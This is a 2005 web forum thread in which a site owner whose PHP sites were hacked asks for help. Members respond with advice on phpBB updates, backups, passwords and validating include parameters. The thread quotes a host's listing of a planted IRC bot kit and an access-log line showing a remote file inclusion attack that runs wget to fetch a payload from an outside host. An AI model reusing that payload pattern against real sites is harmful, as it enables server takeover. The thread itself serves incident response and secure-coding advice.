Printer Friendly Version
Email this thread to a friend
|
ClosedHomes.com - Foreclosed Homes Site For Sale (In: I Want to Sell My Website)
Set up private label dating site for you FREE!!! (In: I Want to Sell My Website)
For Sale Russia/USA Marriage/Dating/Meeting Site (In: I Want to Sell My Website)
I want to sell my site, mzkforums.com (In: I Want to Sell My Website)
I want to sell my site, mzkforums.com (In: I Want to Sell My Website)
Featured Web Site Template |
|
There are 0 guests and 1 members in the forums right now.
Reflects user activity within the last 5 minutes
|
|
| Member |
Message |
designbyfox
Joined: Jul 09, 2005
# Posts: 8
|
Posted: 2005-Jul-09 23:56
Hello, I need some help, but I am not sure where to post this question. I saw something about not posting URL's but I needed help and I have to explain.
I am trying to build a website. I have been hacked, and was using PHP code, to act like a frame, just replacing the middle of the website. But I was told this was a security risk.
SO I am building a new layout. It can be seen here.
[link]
I know the general index.html page should look something like this:
[code] <html>
<head>
<title>Focus Motorsports</title>
<meta name="description" content="Free web site templates to jump start your new web site.">
<meta name="keywords" content="free site template search graphics build web site">
</head>
<frameset framespacing="0" border="0" cols="125,*" frameborder="0">
<frame name="contents" target="main" src="left_nav.html" marginwidth="0" marginheight="0" scrolling="no">
<frame name="main" src="body.html" target="_self" scrolling="auto">
<noframes>
<body>
<p>Focus Motorsports</p>
</body>
</noframes>
</frameset>
</html>[code]
But how do I break down a page like [link] and make it work as frames? If someone could break it down for me, it would greatly be appreciated. I am trying to avoid having pages and pages of menues. So I believe I will need 4 frames. Top, left, middle and right. Actually the top will not change, but I do not know if that should be a frame or what.
PLease help soon.
Many thanks
Heather
|
 |
designbyfox
Joined: Jul 09, 2005
# Posts: 8
|
Posted: 2005-Jul-10 00:04
Unless someone has a different solution. I am all ears.
Thanks
Heather
|
|
g1smd
Staff
Joined: Jul 28, 2002
# Posts: 10418
|
Posted: 2005-Jul-10 09:06
Please avoid frames.
They are difficult for search engines to index.
When a visitor arrives at one of the panels from a search engine result, they see only one panel not the whole frame - you then have to mess with javascript to reframe their panel. If they have javascript turned off then your site appears broken to them.
I am interested in how your site was hacked. If they could load content to your site when it used PHP includes then they can still do it when it uses frames. I would continue using includes but make sure your PHP version is up to date and you use a better site password.
|
|
designbyfox
Joined: Jul 09, 2005
# Posts: 8
|
Posted: 2005-Jul-10 12:43
Hello, Thank you for the advice. I do love how PHP include works. I have it on every site. I was hosting thru startlogic and they sent me this info, but they are refusing to help me, won't reply to my e-mails, so I had to buy new hosting and I am out of the last 6 months of my contract.
Here is what they wrote, which makes absolutly no sense to me:
FIRST E_MAIL:
"Your account was suspended because of the following.
using IRC bots. remove files, change password.
st29:/home/focusmot/public_html/images#find .
./gohack.tar.gz
./.log
./.log/dssl
./.log/xh
./.log/eggdrop
./.log/tcl
./.log/gohack.conf
./.log/t3394
./.log/language
./.log/language/core.german.lang
./.log/language/filesys.english.lang
./.log/language/filesys.french.lang
./.log/language/filesys.german.lang
./.log/language/notes.english.lang
./.log/language/console.german.lang
./.log/language/notes.german.lang
./.log/language/core.english.lang
./.log/language/assoc.german.lang
./.log/language/console.english.lang
./.log/language/core.french.lang
./.log/language/assoc.english.lang
./.log/language/wire.english.lang
./.log/language/wire.german.lang
./.log/language/wire.french.lang
./.log/doc
./.log/doc/compiling.FAQ
./.log/doc/KNOWN-PROBLEMS
./.log/doc/UPDATES1.5
./.log/doc/text-substitutions.doc
./.log/doc/tcl-commands.doc
./.log/doc/BUG-REPORT
./.log/doc/settings
./.log/doc/settings/contents
./.log/doc/settings/mod.compress
./.log/doc/settings/core.settings
./.log/doc/settings/mod.dns
./.log/doc/settings/mod.notes
./.log/doc/settings/mod.channel
./.log/doc/settings/mod.woobie
./.log/doc/settings/mod.console
./.log/doc/settings/mod.assoc
./.log/doc/settings/mod.seen
./.log/doc/settings/mod.irc
./.log/doc/settings/mod.server
./.log/doc/settings/mod.filesys
./.log/doc/settings/mod.blowfish
We need to deleted the entire account and create a new account because
of
this issue. Please reply back when you are ready for the account to be
deleted."
******************************
2nd EMAIL
"The problem is that you got hacked at some point and this IRC bot has changed alot of your files and we do not have a clean back up to replace your current files. This is usually caused by an easy to crack password.
You should normally use an alpha numberic password and even use special charactures."
*************************************
And from there, communication has been cut off. I lost my forum and everything. The won't even let me in the back it up. I did not do anything illegal, I don't even know how those bots got there. But the company was rude, so I am moving on. I am now trying to redesign the site to be more active and tougher.
Just gotta figure out how. LIke you said PW protect.
Thanks
Heather
|
|
g1smd
Staff
Joined: Jul 28, 2002
# Posts: 10418
|
Posted: 2005-Jul-10 18:07
Your host didn't have a clean backup of your stuff? What a rubbish host.
Did you also backup your data on a regular basis? No? Hope you do next time.
Looks like some automated "virus-like" process took out your forum. That would probably be a bug in the forum software, that allowed the hackers in, rather than a problem with the hosting itself. Always keep forum software up to date, known exploits are usually exploited within a short while - and many of the exploits use automated searches to rapidly find vulnerable systems.
|
|
g1smd
Staff
Joined: Jul 28, 2002
# Posts: 10418
|
Posted: 2005-Jul-10 18:10
Oh, and even if you do use frames, the forum software still needs to use PHP, so you're focussing on the wrong issue.
|
|
lizardz
Joined: Nov 12, 2004
# Posts: 1394
|
Posted: 2005-Jul-10 19:12
Sounds like you didn't update your forum code when you should have. This problem, as noted, has nothing to do with what kind of HTML you are using, it's a security problem, like they said, easy to guess passwords [good password example: rE5kUu68i bad password example: myname]. A good password is almost impossible to remember.
If you were running phpbb, they have had at least 3 critical updates recently, if you never updated to 2.0.13, assuming you are using phpbb, then your forums were completely open to compromise.
If you are using includes, and are passing those includes data via query strings, and aren't protecting the input data correctly, your server could get hacked by the hacker simply sending the include parameter a script from their own servers, one designed to take your system over.
So many ways to play, moral of the story, learn what internet security is, and then do what you need to do to protect yourself as well as you can. Always do forum db backups, that's not optional, and ideally always run a copy of your forums on your local development box so that if they do get hacked, all you have to do is reupload them, change all your passwords, upload the forum db backup, install it, and you're up and running again in no time.
Forum hacking is a big problem, but it's a big problem mainly because users are not doing the required security updates, so some hosters are being forced into extreme actions, like banning all forum software from their servers, only takes one non secure install to compromise a server, especially if the hoster themselves don't do that great a job on security, which most I think don't.
Remember, despite what everyone says, hackers are your friends, they make your systems more secure by pushing their limits, but you have to keep up or they get to play with your stuff as a reward... at least that's how I like to look at it.
|
|
designbyfox
Joined: Jul 09, 2005
# Posts: 8
|
Posted: 2005-Jul-10 22:04
Hello,
I had a backup from January when I moved severs. I did not back up the forum since. SO I was at wrong there. I always go to PHPBB and download their latest one. The I add a style. And you know what? Looking at this one on my site now, it says "Powered by phpBB 2.0.6". DO the styles override the original version?
If I reload or update my forum with a newer version will I lose stuff?
That backdoor for the include sounds confusing. I don't know how to protect that. But the new server I am at now has good security.
The last server did not back up my site.
Thanks for your help.
Heather
|
|
lizardz
Joined: Nov 12, 2004
# Posts: 1394
|
Posted: 2005-Jul-11 02:19
If it says 'powered by phpbb 2.0.6 you haven't correctly applied an update since 2.0.6. That number changes when you do the update if you do it correctly, but phpbb has been having trouble with people not doing the updates right, especially with not running the update_to_latest.php script.
Note I said: people not doing the updates right. There's no problem with the updates themselves, the problem is people just won't take the roughly 5-10 minutes it takes to read the update readme files, and don't upgrade the db when they upload the update files.
The current version is 2.0.16. If you correctly download and install [that means read the directions, follow the directions] the upgrade from 2.0.6 to 2.0.16 you should have no troubles, as long as you have no forum mods. If you have forum mods, you'll need to do it by hand most likely.
after 2.0.13 that number no longer displays unless you are in the forum admin area.
Your version was completely out of date, and probably allowed hackers access, possibly to the server. No amount of server side security can protect software with security holes from being exploited, it's up to you to keep your software, phpbb in this case, up to date.
Re Include security: My best advice is to avoid using methods that you don't understand until you do understand them, it's not that much to learn, but it is something. Look up php security, php include security etc on google and you'll find lots of good articles, some are pretty easy to read. Again, there is only risk if you are loading material based on passed query string parameters and haven't properly protected yourself. If you aren't doing this, if the includes are simply hard coded into each webpage, like include('somefile.php'); there is no risk to speak of from that area.
If you don't update your phpbb, and don't install the security releases quite soon after they are released, you will be at risk. The new versions of phpbb, after 2.0.13 I think, have in the admin section a notification if you are upto date or not.
Re backups: phpbb makes backing up your forum very easy, but again, it does no good if you dont' use the tools they give you. If you choose the compressed option, your forum db stuff only takes about 1/10 the size on your local hard disk, that's a good choice. If you don't have recent backups, you should expect to lose everything routinely, because there's a lot of eyes on phpbb software right at the moment, and it's fun for crackers to break your db and forums, it's like spraying graffiti or something. It's best not to be the one that gives the crackers this fun, but it's also best to be prepared, which means doing backups whenever it's called for, if your forum gets lots of traffic and lots of new postings daily, do daily backups. You can automate backups if you are so inclined, but it's requires some programming to do it. Having a good backup procedure makes getting hacked a not very big deal in some ways.
|
|
Curt
Joined: Eons Ago
# Posts: 3735
|
Posted: 2005-Jul-13 00:30
Hackers your friend? Maybe they are your friends—the majority of us consider them enemies because they destroy and corrupt things that are at times irreplaceable. They don't help anybody.
|
|
lizardz
Joined: Nov 12, 2004
# Posts: 1394
|
Posted: 2005-Jul-13 09:10
Personally, I like crackers, I like the attitude, I at times make pretty good money cleaning up the problems they create. And it's easy money too I'd add. And I like it when my sites get probed by crackers, lets me see the security holes I may have missed, otherwise there's no warning. It's because of lightweight crackers that I started updating phpbb forums for example, I used to never think about it, also why I started doing better backups, why my clients have double or triple reduntant backups, why I always protect against things like mysql injection attackes. In other words, they pushed me to implement procedures I should have been doing all along but was too lazy to get around to.
If you check out some of the more interesting cracker sites, you'll find this is the prevailing attitude among them, they like finding weakness, and computer types should like knowing about those weaknesses so they can take appropriate action before the problem occurs, not after. For example, on zone-h.org they have a form that asks what your interests are, one option is security professional.
If it wasn't for script kiddies playing with their various toys, MS would never have tightened up their XP and IIS security for example, and then those installations would have been taken over by true professionals happy to monetize in much more serious ways those loopholes, the tech gangs we're starting to see much more of now: russians, asians, whoever, people who can really mess you up. Script kiddies usually just create waves of grafitti that attracts so much attention to the security holes they are exploiting that it forces the companies who may otherwise not have cleaned up their acts in time to start fixing their stuff.
And of course it helps push the alternatives, Mac, Linux etc. A friend is someone who tells you bad news even if you don't want to hear it. It's easier to just believe MS for example when they say: Windows 2000 is totally secure, etc. Not true, but comforting enough to some of the people. I was reading about phpbb weaknesses almost a year before they really starting exploiting them. Where? On cracker sites.
Speaking only for myself, these guys crack me up, every new wave of viruses is like an ongoing joke, it's funny to watch everyone scrambling around. Of course, I never host on Windows, usually prefer freeBSD, never use IIS, don't use MSIE or Outlook/Outlook Express, so the stuff is just something that happens to other people, sad news for them of course, but avoidable sad news in most cases.
Respect your enemies and you'll find you do much better, that applies as a general rule too... but best is to befriend them, that goes back thousands of years, sun tzu I think noticed that.
[ Message was edited by: lizardz 07/13/2005 01:32 am ]
|
|
designbyfox
Joined: Jul 09, 2005
# Posts: 8
|
Posted: 2005-Aug-02 20:37
Well, I got hacked again. This time a different server and a different website. This time the hosting company was nice, and I didn't lose anything. But how do I prevent this!
The hosting company e-mailed this to me:
The logs below exposes the hacker's IP and how he/she had entered your website and was able to execute these commands.
(Not sure if I should post this stuff, but I can edit)
201.19.123.228 - - [01/Aug/2005:18:59:21 -0400] "GET /index1.php?inside=http://67.43.156.64/~fernando/scmd.txt?&cmd=cd%20/tmp/.a1b2c3;wget%20http://tudomeu.brdominio.com/mg3.txt HTTP/1.1" 200 4206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
201.19.123.228 - - [01/Aug/2005:18:59:21 -0400] "GET /images/cartcttn.jpg HTTP/1.1" 304 - "http://www.designbyfox.com/index1.php?
And it just goes on.
The he writes:
"index1.php" is insecure and allows anonymous users to execute commands under your account.
This type of attack is called a "XSS" attack - Cross Site Scripting attack. It can be avoided by verifying your QUERY_STING instead of just processing each include file as its read.
For example:
if ($include == "homepage" ) { include("includes/homepage.inc" ); }
elseif ($include == "aboutus" ) { include("includes/aboutus.inc" ); }
else { print "unknown include"; }
I highly recommend looking up on XSS attacks as this is becoming a major issue in the hosting field, alot of automatted scripts have already been released which scour and take advantage of this flaw.
-----------------------------------------
SO I have been looking up about this. And I responded to him with questions from my reading. Like I found people telling me to spell out symbols like < > & # (). But I don't see how to fix my <?php
include("$center" );
?> code.
I am willing to pay someone to help, but I have several sites that need to be fixed, so any help will be greatly appreciated.
Thanks, Heather
Fixed Code
[ Message was edited by: JimBot 08/02/2005 03:49 pm ... Reason: Fixed Code Typos. ]
|
|
designbyfox
Joined: Jul 09, 2005
# Posts: 8
|
Posted: 2005-Aug-02 20:38
What the heck is with the  lol.
|
|
g1smd
Staff
Joined: Jul 28, 2002
# Posts: 10418
|
Posted: 2005-Aug-02 23:51
What they are saying is that you aren't verifying the values that get sent into your pages, from the dyanamic query strings used to access the pages.
Your site will accept www.yoursite.com/yourscript.php?value=some-code-that-hacks-your-site and you should be checking those values very carefully and rejecting anything that is unsafe.
|
|
designbyfox
Joined: Jul 09, 2005
# Posts: 8
|
Posted: 2005-Aug-03 02:08
Ok, I have never heard of this. How do I check my values? What is a value? The individual webpages connected to the index page?
|
|
lizardz
Joined: Nov 12, 2004
# Posts: 1394
|
Posted: 2005-Aug-03 05:59
Where did you get the script you are running? If you wrote it yourself, you'll need to learn a bit about validating user controllable input data, if you got it from a script source, don't ever use that source again.
|
|
designbyfox
Joined: Jul 09, 2005
# Posts: 8
|
Posted: 2005-Aug-03 12:48
I got some help. I am all set now. thank you all.
|
|
You are not permitted to post messages in this forum or topic, because of one or more of the following reasons:
- You have not yet logged in, or registered properly as a member
- You are a member, but no longer have posting rights.
- This is a private forum, for which you do not have permissions.
If you are a recent member, it's possible that you simply have not yet confirmed your account. Please
check your email for a message entitled 'JimWorld Forums: Confirm Your Account' and follow the instructions
contained within.
If you cannot find this message, click here to Re-Send it.
|
If you are still experiencing problem, please read the
Login Assistance
Article for some advice on what may be causing your login not to work properly.
|
Switch to Advanced Editor and ...
Create a New Topic
or Reply to this Thread
|
|
Inbox
